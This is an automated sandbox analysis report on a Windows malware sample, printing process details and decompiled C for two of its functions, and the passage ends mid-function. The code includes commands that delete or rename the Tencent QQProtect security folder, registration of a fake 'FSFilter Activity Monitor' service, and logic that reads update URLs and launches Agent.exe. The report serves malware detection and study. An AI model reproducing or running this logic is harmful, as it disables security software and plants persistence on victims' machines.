Analysis Process: cmd.exePID: 6460, Parent PID: 6440

General

Target ID:	1
Start time:	16:18:09
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c md C:\DownLoad-Helper
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6472, Parent PID: 6460

General

Target ID:	2
Start time:	16:18:10
Start date:	14/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: dinhVFAbgo.exePID: 6440, Parent PID: 5816COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15%
Total number of Nodes:	965
Total number of Limit Nodes:	43

Executed Functions

Function 00CA8A72 Relevance: 57.9, APIs: 22, Strings: 11, Instructions: 169
sleepthreadlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00CA8A72(CHAR* __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				void _v32;
				char _v72;
				void _v152;
				void _v236;
				long _v240;
				void* _v244;
				signed int _v268;
				char _v272;
				char _v532;
				void* _v536;
				char _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				struct HWND__* _t74;
				void* _t77;
				void* _t78;
				signed int _t82;
				char* _t84;
				void* _t90;
				void _t94;
				void _t95;
				intOrPtr _t98;
				char _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				void _t111;
				void _t112;
				intOrPtr _t115;
				char _t116;
				void _t117;
				intOrPtr _t120;
				char _t125;
				intOrPtr _t126;
				void* _t140;
				void* _t145;
				void* _t172;
				void* _t173;
				char* _t174;
				signed int _t175;
				void* _t177;
				char* _t179;
				signed int _t182;
				signed int _t185;
				char* _t190;
				intOrPtr* _t191;
				signed int _t193;
				signed int _t196;
				signed int _t202;
				int _t207;
				intOrPtr* _t208;
				signed int _t211;
				CHAR* _t229;
				void* _t230;
				void* _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				void* _t241;
				void* _t247;
				void* _t249;
				void* _t254;
				void* _t260;
				void* _t262;
				void* _t268;
				void* _t283;
				void* _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t296;
				void* _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t321;

				_t229 = __edx;
				_t73 =  *0xe68dd4; // 0x8d2643c2
				_t74 = _t73 ^ _t306;
				_v8 = _t74;
				__imp__GetConsoleWindow(_t284, _t234);
				EnableMenuItem(GetSystemMenu(_t74, 0), 0xf060, 1); // executed
				_t77 = E00CA889D(); // executed
				if(_t77 != 0) {
					_t78 = CreateMutexA(0, 0, "services.exe"); // executed
					_t173 = _t78;
					_v244 = _t173;
					if(GetLastError() != 0xb7) {
						E00DEB75C(_t229); // executed
						_t140 = CreateThread(0, 0, E00CA5FC9, 0, 0,  &_v240); // executed
						WaitForSingleObject(_t140, 0xffffffff);
						GetProcAddress(LoadLibraryA("KERNEL32.dll"), "WinExec");
						_t211 = 0x14;
						memcpy( &_v152, "cmd /c ren C:\\\"Program Files (x86)\"\\\"Common Files\"\\Tencent\\QQProtect\\sonfig Bin", _t211 << 2);
						_t145 = memcpy( &_v236, "cmd /c rmdir /s /q C:\\\"Program Files (x86)\"\\\"Common Files\"\\Tencent\\QQProtect\\Bin", 0 << 2);
						asm("movsb");
						_t177 = _t145;
						memcpy( &_v32, "cmd /c del C:\\jc.txt", 0 << 2);
						asm("movsb");
						memcpy( &_v72, "C:\\DownLoad-Helper\\servicesDecode.exe", 0 << 2);
						_t321 = _t308 + 0x30;
						asm("movsw");
						DeleteFileA( &_v72);
						 *_t177( &_v236, 0, 9, 5, 0x14, "md C:\\DownLoad-Helper");
						Sleep(0x3e8);
						 *_t177( &_v152, 0);
						Sleep(0x3e8);
						 *_t177( &_v32, 0);
						Sleep(0x3e8);
						E00CA6AC9();
						CreateThread(0, 0, E00CA8307, 0, 0,  &_v240);
						CreateThread(0, 0, E00CA8311, 0, 0,  &_v240);
						CreateThread(0, 0, E00CA8464, 0, 0,  &_v240);
						E00DEBC8D(0, ".ACP");
						 *0xe897bc = GetProcAddress(GetModuleHandleA("ntdll"), "ZwQueryInformationThread");
						CreateThread(0, 0, E00CA87D8, 0, 0,  &_v240);
						CloseHandle(_v244);
						L00DE5F97(CreateThread, 0, Sleep);
						L4:
						E00CA1FB7();
						 *_t321 = 0x2710;
						Sleep(0xe4c7f0);
						goto L4;
					}
					CloseHandle(_t173);
					E00DEBA22(0);
					asm("int3");
					_push(_t306);
					_t307 = _t308;
					_t82 =  *0xe68dd4; // 0x8d2643c2
					_v268 = _t82 ^ _t307;
					_push(_t173);
					_t174 = _t179;
					_push(0);
					_push(_t234);
					if(_t174 == 0 || _t229 == 0) {
						L10:
						_t84 = 0;
					} else {
						GetFullPathNameA(_t229, 0x104,  &_v532, 0);
						_t236 = OpenSCManagerA(0, 0, 0xf003f);
						_push(0);
						if(_t236 != 0) {
							_t90 = CreateServiceA(_t236, _t174, _t174, 0xf01ff, 2, 3, 0,  &_v532, "FSFilter Activity Monitor", 0, "FltMgr", 0, ??);
							if(_t90 != 0) {
								CloseServiceHandle(_t90);
								CloseServiceHandle(_t236);
								_t182 = 8;
								memcpy( &_v272, "SYSTEM\\CurrentControlSet\\Services\\", _t182 << 2);
								_t230 = _t174;
								asm("movsw");
								asm("movsb");
								_t290 = _t230;
								do {
									_t94 =  *_t230;
									_t230 = _t230 + 1;
								} while (_t94 != 0);
								_t229 = _t230 - _t290;
								_t241 =  &_v272 - 1;
								do {
									_t95 =  *(_t241 + 1);
									_t241 = _t241 + 1;
								} while (_t95 != 0);
								_t185 = _t229 >> 2;
								memcpy(_t241, _t290, _t185 << 2);
								memcpy(_t290 + _t185 + _t185, _t290, _t229 & 0x00000003);
								_t247 =  &_v272 - 1;
								do {
									_t98 =  *((intOrPtr*)(_t247 + 1));
									_t247 = _t247 + 1;
								} while (_t98 != 0);
								asm("movsd");
								asm("movsd");
								asm("movsw");
								asm("movsb");
								if(RegCreateKeyExA(0x80000002,  &_v272, 0, 0xe4bcbb, 1, 0xf003f, 0,  &_v536,  &_v540) != 0) {
									goto L10;
								} else {
									_t190 = _t174;
									_t232 =  &_v272 - _t174;
									do {
										_t103 =  *_t190;
										 *((char*)(_t232 + _t190)) = _t103;
										_t190 =  &(_t190[1]);
									} while (_t103 != 0);
									_t249 =  &_v272 - 1;
									do {
										_t104 =  *((intOrPtr*)(_t249 + 1));
										_t249 = _t249 + 1;
									} while (_t104 != 0);
									_t191 =  &_v272;
									_t229 = _t191 + 1;
									asm("movsd");
									asm("movsd");
									asm("movsw");
									do {
										_t105 =  *_t191;
										_t191 = _t191 + 1;
									} while (_t105 != 0);
									if(RegSetValueExA(_v536, "DefaultInstance", 0, 1,  &_v272, _t191 - _t229) != 0) {
										goto L10;
									} else {
										RegFlushKey(_v536);
										RegCloseKey(_v536);
										_t193 = 8;
										memcpy( &_v272, "SYSTEM\\CurrentControlSet\\Services\\", _t193 << 2);
										_t233 = _t174;
										asm("movsw");
										asm("movsb");
										_t294 = _t233;
										do {
											_t111 =  *_t233;
											_t233 = _t233 + 1;
										} while (_t111 != 0);
										_t229 = _t233 - _t294;
										_t254 =  &_v272 - 1;
										do {
											_t112 =  *(_t254 + 1);
											_t254 = _t254 + 1;
										} while (_t112 != 0);
										_t196 = _t229 >> 2;
										memcpy(_t254, _t294, _t196 << 2);
										memcpy(_t294 + _t196 + _t196, _t294, _t229 & 0x00000003);
										_t260 =  &_v272 - 1;
										do {
											_t115 =  *((intOrPtr*)(_t260 + 1));
											_t260 = _t260 + 1;
										} while (_t115 != 0);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t296 = _t174;
										do {
											_t116 =  *_t174;
											_t174 =  &(_t174[1]);
										} while (_t116 != 0);
										_t175 = _t174 - _t296;
										_t262 =  &_v272 - 1;
										do {
											_t117 =  *(_t262 + 1);
											_t262 = _t262 + 1;
										} while (_t117 != 0);
										_t202 = _t175 >> 2;
										memcpy(_t262, _t296, _t202 << 2);
										memcpy(_t296 + _t202 + _t202, _t296, _t175 & 0x00000003);
										_t268 =  &_v272 - 1;
										do {
											_t120 =  *((intOrPtr*)(_t268 + 1));
											_t268 = _t268 + 1;
										} while (_t120 != 0);
										_t174 = 0;
										asm("movsd");
										asm("movsd");
										asm("movsw");
										if(RegCreateKeyExA(0x80000002,  &_v272, 0, 0xe4bcbb, 1, 0xf003f, 0,  &_v536,  &_v540) != 0) {
											goto L10;
										} else {
											_t207 = 0;
											do {
												_t61 = _t207 + "370030"; // 0x30303733
												_t125 =  *_t61;
												 *((char*)(_t307 + _t207 - 0x108)) = _t125;
												_t207 = _t207 + 1;
											} while (_t125 != 0);
											_t208 =  &_v272;
											_t229 = _t208 + 1;
											do {
												_t126 =  *_t208;
												_t208 = _t208 + 1;
											} while (_t126 != 0);
											if(RegSetValueExA(_v536, "Altitude", 0, 1,  &_v272, _t208 - _t229) != 0) {
												goto L10;
											} else {
												_v540 = 0;
												if(RegSetValueExA(_v536, ?str?, 0, 4,  &_v540, 4) != 0) {
													goto L10;
												} else {
													RegFlushKey(_v536);
													RegCloseKey(_v536);
													_t84 = 1;
												}
											}
										}
									}
								}
							} else {
								if(GetLastError() != 0x431) {
									_t174 = 0;
								} else {
									_t174 = 1;
								}
								CloseServiceHandle(0);
								CloseServiceHandle(_t236);
								_t84 = _t174;
							}
						} else {
							CloseServiceHandle();
							goto L10;
						}
					}
					_pop(_t235);
					_pop(_t286);
					return E00DDCBCE(_t84, _t174, _v12 ^ _t307, _t229, _t235, _t286);
				} else {
					_pop(_t305);
					_pop(_t283);
					return E00DDCBCE(_t77, _t172, _v8 ^ _t306, _t229, _t283, _t305);
				}
			}

0x00ca8a72
0x00ca8a7b
0x00ca8a80
0x00ca8a82
0x00ca8a88
0x00ca8aa0
0x00ca8aa6
0x00ca8aad
0x00ca8ac5
0x00ca8acb
0x00ca8acd
0x00ca8ade
0x00ca8ae9
0x00ca8aff
0x00ca8b08
0x00ca8b1f
0x00ca8b27
0x00ca8b35
0x00ca8b43
0x00ca8b4a
0x00ca8b4b
0x00ca8b55
0x00ca8b5c
0x00ca8b65
0x00ca8b65
0x00ca8b67
0x00ca8b69
0x00ca8b78
0x00ca8b88
0x00ca8b93
0x00ca8b98
0x00ca8ba0
0x00ca8ba5
0x00ca8ba7
0x00ca8bc4
0x00ca8bd6
0x00ca8be8
0x00ca8bf0
0x00ca8c0e
0x00ca8c23
0x00ca8c2b
0x00ca8c31
0x00ca8c36
0x00ca8c3b
0x00ca8c40
0x00ca8c47
0x00000000
0x00ca8c47
0x00ca8c4c
0x00ca8c53
0x00ca8c58
0x00ca8c59
0x00ca8c5a
0x00ca8c62
0x00ca8c69
0x00ca8c6c
0x00ca8c6d
0x00ca8c6f
0x00ca8c70
0x00ca8c73
0x00ca8ca9
0x00ca8ca9
0x00ca8c79
0x00ca8c89
0x00ca8c9c
0x00ca8c9e
0x00ca8ca1
0x00ca8cda
0x00ca8ce2
0x00ca8d0f
0x00ca8d12
0x00ca8d16
0x00ca8d22
0x00ca8d24
0x00ca8d26
0x00ca8d28
0x00ca8d29
0x00ca8d2b
0x00ca8d2b
0x00ca8d2d
0x00ca8d2e
0x00ca8d38
0x00ca8d3a
0x00ca8d3b
0x00ca8d3b
0x00ca8d3e
0x00ca8d3f
0x00ca8d45
0x00ca8d48
0x00ca8d4f
0x00ca8d57
0x00ca8d58
0x00ca8d58
0x00ca8d5b
0x00ca8d5c
0x00ca8d75
0x00ca8d88
0x00ca8d91
0x00ca8d93
0x00ca8d9c
0x00000000
0x00ca8da2
0x00ca8da8
0x00ca8daa
0x00ca8dac
0x00ca8dac
0x00ca8dae
0x00ca8db1
0x00ca8db2
0x00ca8dbc
0x00ca8dbd
0x00ca8dbd
0x00ca8dc0
0x00ca8dc1
0x00ca8dca
0x00ca8dd0
0x00ca8dd3
0x00ca8dd4
0x00ca8dd5
0x00ca8dd7
0x00ca8dd7
0x00ca8dd9
0x00ca8dda
0x00ca8dff
0x00000000
0x00ca8e05
0x00ca8e0b
0x00ca8e17
0x00ca8e1f
0x00ca8e2b
0x00ca8e2d
0x00ca8e2f
0x00ca8e31
0x00ca8e32
0x00ca8e34
0x00ca8e34
0x00ca8e36
0x00ca8e37
0x00ca8e41
0x00ca8e43
0x00ca8e44
0x00ca8e44
0x00ca8e47
0x00ca8e48
0x00ca8e4e
0x00ca8e51
0x00ca8e58
0x00ca8e60
0x00ca8e61
0x00ca8e61
0x00ca8e64
0x00ca8e65
0x00ca8e6e
0x00ca8e6f
0x00ca8e70
0x00ca8e71
0x00ca8e73
0x00ca8e73
0x00ca8e75
0x00ca8e76
0x00ca8e80
0x00ca8e82
0x00ca8e83
0x00ca8e83
0x00ca8e86
0x00ca8e87
0x00ca8e8d
0x00ca8e90
0x00ca8e97
0x00ca8e9f
0x00ca8ea0
0x00ca8ea0
0x00ca8ea3
0x00ca8ea4
0x00ca8eae
0x00ca8ec5
0x00ca8ed3
0x00ca8ed9
0x00ca8ee3
0x00000000
0x00ca8ee9
0x00ca8ee9
0x00ca8eeb
0x00ca8eeb
0x00ca8eeb
0x00ca8ef1
0x00ca8ef8
0x00ca8ef9
0x00ca8efd
0x00ca8f03
0x00ca8f06
0x00ca8f06
0x00ca8f08
0x00ca8f09
0x00ca8f2f
0x00000000
0x00ca8f35
0x00ca8f3d
0x00ca8f56
0x00000000
0x00ca8f5c
0x00ca8f62
0x00ca8f6e
0x00ca8f76
0x00ca8f76
0x00ca8f56
0x00ca8f2f
0x00ca8ee3
0x00ca8dff
0x00ca8ce4
0x00ca8cef
0x00ca8cf6
0x00ca8cf1
0x00ca8cf3
0x00ca8cf3
0x00ca8cff
0x00ca8d02
0x00ca8d04
0x00ca8d04
0x00ca8ca3
0x00ca8ca3
0x00000000
0x00ca8ca3
0x00ca8ca1
0x00ca8cae
0x00ca8caf
0x00ca8cb9
0x00ca8aaf
0x00ca8ab2
0x00ca8ab3
0x00ca8abd
0x00ca8abd

APIs

GetConsoleWindow.KERNEL32 ref: 00CA8A88
GetSystemMenu.USER32(00000000,00000000), ref: 00CA8A92
EnableMenuItem.USER32 ref: 00CA8AA0

Part of subcall function 00CA889D: ImpersonateSelf.KERNELBASE(00000002), ref: 00CA88C8
Part of subcall function 00CA889D: GetCurrentThread.KERNEL32 ref: 00CA88DF
Part of subcall function 00CA889D: OpenThreadToken.ADVAPI32(00000000), ref: 00CA88E6
Part of subcall function 00CA889D: GetLastError.KERNEL32 ref: 00CA88F0
Part of subcall function 00CA889D: GetCurrentProcess.KERNEL32(00000008,?), ref: 00CA890D
Part of subcall function 00CA889D: OpenProcessToken.ADVAPI32(00000000), ref: 00CA8916
Part of subcall function 00CA889D: GetCurrentProcess.KERNEL32(00000008,?), ref: 00CA8926
Part of subcall function 00CA889D: OpenProcessToken.ADVAPI32(00000000), ref: 00CA8929
Part of subcall function 00CA889D: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA894A
Part of subcall function 00CA889D: LocalAlloc.KERNEL32(00000040,00000014), ref: 00CA8962
Part of subcall function 00CA889D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00CA8971
Part of subcall function 00CA889D: GetLengthSid.ADVAPI32(?), ref: 00CA8982
Part of subcall function 00CA889D: LocalAlloc.KERNEL32(00000040,00000010), ref: 00CA898E
Part of subcall function 00CA889D: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 00CA899E
Part of subcall function 00CA889D: AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?), ref: 00CA89B4

CreateMutexA.KERNEL32(00000000,00000000,services.exe), ref: 00CA8AC5
GetLastError.KERNEL32 ref: 00CA8AD3
CreateThread.KERNEL32 ref: 00CA8AFF
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CA8B08
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 00CA8B13
GetProcAddress.KERNEL32(00000000,WinExec), ref: 00CA8B1F
DeleteFileA.KERNEL32(?), ref: 00CA8B69
Sleep.KERNEL32(000003E8), ref: 00CA8B88
Sleep.KERNEL32(000003E8), ref: 00CA8B98
Sleep.KERNEL32(000003E8), ref: 00CA8BA5
CreateThread.KERNEL32 ref: 00CA8BC4
CreateThread.KERNEL32 ref: 00CA8BD6

Strings

ntdll, xrefs: 00CA8BF7
KERNEL32.dll, xrefs: 00CA8B0E
ZwQueryInformationThread, xrefs: 00CA8C02
cmd /c rmdir /s /q C:\"Program Files (x86)"\"Common Files"\Tencent\QQProtect\Bin, xrefs: 00CA8B38
md C:\DownLoad-Helper, xrefs: 00CA8AE4
services.exe, xrefs: 00CA8ABE
C:\DownLoad-Helper\servicesDecode.exe, xrefs: 00CA8B5D
WinExec, xrefs: 00CA8B19
.ACP, xrefs: 00CA8BEA
cmd /c del C:\jc.txt, xrefs: 00CA8B4D
cmd /c ren C:\"Program Files (x86)"\"Common Files"\Tencent\QQProtect\sonfig Bin, xrefs: 00CA8B2A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Thread$CreateProcess$CurrentInitializeOpenSleepToken$AllocErrorLastLocalMenu$AccessAddressAllocateAllowedConsoleDeleteDescriptorEnableFileImpersonateItemLengthLibraryLoadMutexObjectProcSecuritySelfSingleSystemWaitWindow
String ID: .ACP$C:\DownLoad-Helper\servicesDecode.exe$KERNEL32.dll$WinExec$ZwQueryInformationThread$cmd /c del C:\jc.txt$cmd /c ren C:\"Program Files (x86)"\"Common Files"\Tencent\QQProtect\sonfig Bin$cmd /c rmdir /s /q C:\"Program Files (x86)"\"Common Files"\Tencent\QQProtect\Bin$md C:\DownLoad-Helper$ntdll$services.exe
API String ID: 598726431-1331491548
Opcode ID: f13ba3c845fa758ec78bdba5d69268723f7a38d460957a80d9cc26139ead25c8
Instruction ID: 87974f0fd78bc715cf992fdd0f418e6851d86228c5bb3a09bad2796b12c3dfbc
Opcode Fuzzy Hash: f13ba3c845fa758ec78bdba5d69268723f7a38d460957a80d9cc26139ead25c8
Instruction Fuzzy Hash: C741B172944248BFDB20ABA2EC49EEF7B7CEB86B14F108466F515B3090DB7459098B70

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5FC9 Relevance: 52.9, APIs: 16, Strings: 14, Instructions: 433
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00CA5FC9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
				void* _t122;
				signed int _t124;
				CHAR* _t137;
				signed int _t155;
				void* _t157;
				void* _t158;
				void* _t160;
				signed int _t188;
				signed int _t197;
				void* _t206;
				signed int _t212;
				signed int _t213;
				void* _t219;
				signed int _t228;
				signed int _t270;
				signed int _t280;
				signed int _t292;
				void* _t300;
				intOrPtr _t301;
				void* _t311;
				intOrPtr _t318;
				void* _t326;
				void* _t328;
				void* _t329;
				intOrPtr* _t330;
				void* _t331;
				void* _t335;
				long long _t342;

				_t342 = __fp0;
				_t315 = __esi;
				_t302 = __edi;
				_t297 = __edx;
				_push(0x274);
				E00DDD55F(0xe07e48, __ebx, __edi, __esi);
				_t228 = 0;
				while(1) {
					_t122 = E00CA5D23(); // executed
					_t333 = _t122;
					if(_t122 != 0) {
						break;
					}
					__eflags = _t228 - 0xa;
					if(_t228 > 0xa) {
						__eflags =  *0xe897b0;
						if(__eflags == 0) {
							E00CA5EAB(_t228, _t302, _t315, __eflags);
							E00CA7EA9(_t228, _t302, _t315, __eflags);
							 *0xe897b0 = 1;
						}
						_t292 = 8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t315 = "C:\\DownLoad-Helper\\services.exe";
						memcpy(_t328 - 0x40, _t315, _t292 << 2);
						_t329 = _t329 + 0xc;
						_t302 = _t315 + _t292 + _t292;
						_t124 = E00CA9583(__eflags, 1);
						 *(_t328 - 0x280) = _t124;
						 *(_t328 - 4) =  *(_t328 - 4) & 0x00000000;
						__eflags = _t124;
						if(__eflags != 0) {
							E00CA2303(_t228, _t124, _t302, _t315, __eflags);
						}
						_t7 = _t328 - 4;
						 *_t7 =  *(_t328 - 4) | 0xffffffff;
						__eflags =  *_t7;
						_t297 = _t328 - 0x40;
						E00CA24AB(_t228, _t328 - 0x20, _t328 - 0x40, _t302, _t315,  *_t7);
					}
					Sleep(0x3e8);
					_t228 = _t228 + 1; // executed
					__eflags = _t228;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00DDFBE0(0, _t328 - 0x151, 0, 0xf1);
				E00DEAEC2(_t328 - 0x164, 0x104, "\\Update.ini");
				_t330 = _t329 + 0x18;
				E00CA2ABC(_t228, _t328 - 0x270, 0, 0x104, _t333);
				 *(_t328 - 4) = 1;
				E00CA2C3F(_t328 - 0x26c, 0x104, E00CAA9F1());
				 *(_t328 - 4) = 2;
				_t137 = E00CA2BCE(0x80, _t328 - 0x26c, 0x104, 0x80);
				_t230 = GetPrivateProfileStringA;
				GetPrivateProfileStringA("MAINVER", "mainver", 0, _t137, 0x80,  *(_t328 - 0x270)); // executed
				E00CA67F5(_t328 - 0x26c, 0xffffffff);
				E00DEAEAF( *((intOrPtr*)(_t328 - 0x26c)));
				 *((long long*)(_t328 - 0x18)) = _t342;
				 *_t330 = 0xe4bcbb;
				_push(E00CA2DF6(_t328 - 0x164));
				E00CA2CD7(GetPrivateProfileStringA, _t328 - 0x26c, 0, 0x104, 0xe4bcbb);
				GetPrivateProfileStringA("INIURL", "iniurl", 0, E00CA2BCE(GetPrivateProfileStringA, _t328 - 0x26c, 0x104, 0x104), 0x104,  *(_t328 - 0x270)); // executed
				E00CA67F5(_t328 - 0x26c, 0xffffffff);
				_t29 = E00CA68F8(GetPrivateProfileStringA, 0, 0x104) + 0x10; // 0x10
				_t318 = _t29;
				 *((intOrPtr*)(_t328 - 0x27c)) = _t318;
				 *(_t328 - 4) = 3;
				 *_t330 = 0xe4bcbb;
				_push(E00CA2DF6( *((intOrPtr*)(_t328 - 0x26c)) + 0xfffffff0));
				E00CA2CD7(_t230, _t328 - 0x26c, 0, _t318, 0xe4bcbb);
				GetPrivateProfileStringA("RESTART", "restart", 0, E00CA2BCE(_t230, _t328 - 0x26c, _t318, 0x104), 0x104,  *(_t328 - 0x270));
				E00CA67F5(_t328 - 0x26c, 0xffffffff);
				_t155 =  *((intOrPtr*)(_t328 - 0x26c)) + 0xfffffff0;
				_push(_t155);
				 *(_t328 - 0x274) = _t155;
				_t38 = E00CA68F8(_t230, 0, _t318) + 0x10; // 0x10
				_t305 = _t38;
				 *(_t328 - 0x280) = _t305;
				while(1) {
					 *(_t328 - 4) = 4;
					_t334 =  *((intOrPtr*)(_t318 - 0xc));
					if( *((intOrPtr*)(_t318 - 0xc)) != 0) {
						break;
					}
					Sleep(0x3e8); // executed
					_t157 = E00CA5559(_t230, _t297, _t305, _t318, __eflags);
					_t40 = _t305 - 0x10; // 0x0
					_t158 = E00CA2975(_t157, _t40);
					_t41 = _t318 - 0x10; // 0x0
					_t160 = E00CA2975(E00CA2975(_t158, _t41),  *(_t328 - 0x274));
					 *(_t328 - 4) =  *(_t328 - 4) | 0xffffffff;
					E00CA2975(_t160,  *(_t328 - 0x270) - 0x10);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					E00DDFBE0(0, _t328 - 0x151, 0, 0xf1);
					E00DEAEC2(_t328 - 0x164, 0x104, "\\Update.ini");
					_t330 = _t330 + 0x18;
					_push(_t328 - 0x164);
					E00CA2ABC(_t230, _t328 - 0x270, 0, "C:\\DownLoad-Helper", __eflags);
					 *(_t328 - 4) = 1;
					E00CA2C3F(_t328 - 0x26c, "C:\\DownLoad-Helper", E00CAA9F1());
					 *(_t328 - 4) = 2;
					GetPrivateProfileStringA("MAINVER", "mainver", 0, E00CA2BCE(_t230, _t328 - 0x26c, 0x80, 0x80), 0x80,  *(_t328 - 0x270)); // executed
					E00CA67F5(_t328 - 0x26c, 0xffffffff);
					E00DEAEAF( *((intOrPtr*)(_t328 - 0x26c)));
					 *((long long*)(_t328 - 0x18)) = _t342;
					_push(E00CA2DF6(0xe4bcbb));
					E00CA2CD7(_t230, _t328 - 0x26c, 0, 0xe4bcbb, 0xe4bcbb);
					GetPrivateProfileStringA("INIURL", "iniurl", 0, E00CA2BCE(_t230, _t328 - 0x26c, 0x104, 0x104), 0x104,  *(_t328 - 0x270)); // executed
					E00CA67F5(_t328 - 0x26c, 0xffffffff);
					_t65 = E00CA68F8(_t230, 0, 0x104) + 0x10; // 0x10
					_t318 = _t65;
					 *((intOrPtr*)(_t328 - 0x27c)) = _t318;
					 *(_t328 - 4) = 3;
					 *_t330 = 0xe4bcbb;
					_push(E00CA2DF6( *((intOrPtr*)(_t328 - 0x26c)) + 0xfffffff0));
					E00CA2CD7(_t230, _t328 - 0x26c, 0, _t318, 0xe4bcbb);
					GetPrivateProfileStringA("RESTART", "restart", 0, E00CA2BCE(_t230, _t328 - 0x26c, _t318, 0x104), 0x104,  *(_t328 - 0x270)); // executed
					E00CA67F5(_t328 - 0x26c, 0xffffffff);
					_t188 =  *((intOrPtr*)(_t328 - 0x26c)) + 0xfffffff0;
					__eflags = _t188;
					_push(_t188);
					 *(_t328 - 0x274) = _t188;
					_t74 = E00CA68F8(_t230, 0, _t318) + 0x10; // 0x10
					_t305 = _t74;
					 *(_t328 - 0x280) = _t305;
				}
				while(1) {
					_t335 = E00CA55D3(_t230, _t328 - 0x27c, _t297, _t305, _t318, _t334);
					if(_t335 != 0) {
						break;
					}
					Sleep(0x3e8);
				}
				E00CA66A0(_t328 - 0x270, _t335, "Update.ini", "Updater.ini");
				GetPrivateProfileStringA("MAINVER", "mainver", 0, E00CA2BCE(_t230, _t328 - 0x26c, 0x80, 0x80), 0x80,  *(_t328 - 0x270));
				E00CA67F5(_t328 - 0x26c, 0xffffffff);
				_t324 =  *((intOrPtr*)(_t328 - 0x26c));
				E00DEAEAF( *((intOrPtr*)(_t328 - 0x26c)));
				 *((long long*)(_t328 - 0x278)) = _t342;
				asm("movsd xmm0, [ebp-0x278]");
				asm("comisd xmm0, [ebp-0x18]");
				if(_t335 > 0) {
					L26:
					__eflags = 0;
					while(1) {
						__eflags =  *0xe897b0;
						if(__eflags == 0) {
							E00CA5EAB(0, _t305, _t324, __eflags);
							E00CA7EA9(0, _t305, _t324, __eflags);
							 *0xe897b0 = 1;
						}
						_t270 = 8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t326 = "C:\\DownLoad-Helper\\services.exe";
						memcpy(_t328 - 0x60, _t326, _t270 << 2);
						_t331 = _t330 + 0xc;
						_t311 = _t326 + _t270 + _t270;
						_t197 = E00CA9583(__eflags, 1);
						 *(_t328 - 0x14) = _t197;
						 *(_t328 - 4) = 5;
						__eflags = _t197;
						if(__eflags != 0) {
							E00CA2303(0, _t197, _t311, _t326, __eflags);
						}
						 *(_t328 - 4) = 4;
						E00CA24AB(0, _t328 - 0x30, _t328 - 0x60, _t311, _t326, __eflags);
						_t324 = "C:\\DownLoad-Helper";
						_t305 = _t328 - 0x268;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						asm("movsb");
						E00DDFBE0(_t328 - 0x268, _t328 - 0x255, 0, 0xf1);
						_t330 = _t331 + 0xc;
						E00CA6967(_t328 - 0x268, "\\Agent.exe");
						_push(_t328 - 0x268);
						E00CA2ABC(0, _t328 - 0x274, _t328 - 0x268, "C:\\DownLoad-Helper", __eflags);
						 *(_t328 - 4) = 6;
						__eflags = ShellExecuteA(0, "open", E00CA6821(_t328 - 0x274), 0, 0, 1) - 0x20;
						if(__eflags > 0) {
							ExitProcess(0);
						}
						Sleep(0x3e8);
						_t206 = E00CA5596(0, "\\Agent.exe", _t305, "C:\\DownLoad-Helper", __eflags);
						 *(_t328 - 4) = 4;
						E00CA2AB2(_t206, _t328 - 0x274);
					}
				}
				_push("YES");
				E00CA2ABC(_t230, _t328 - 0x274, _t305, _t324, _t335);
				 *(_t328 - 4) = 7;
				_t212 = _t305;
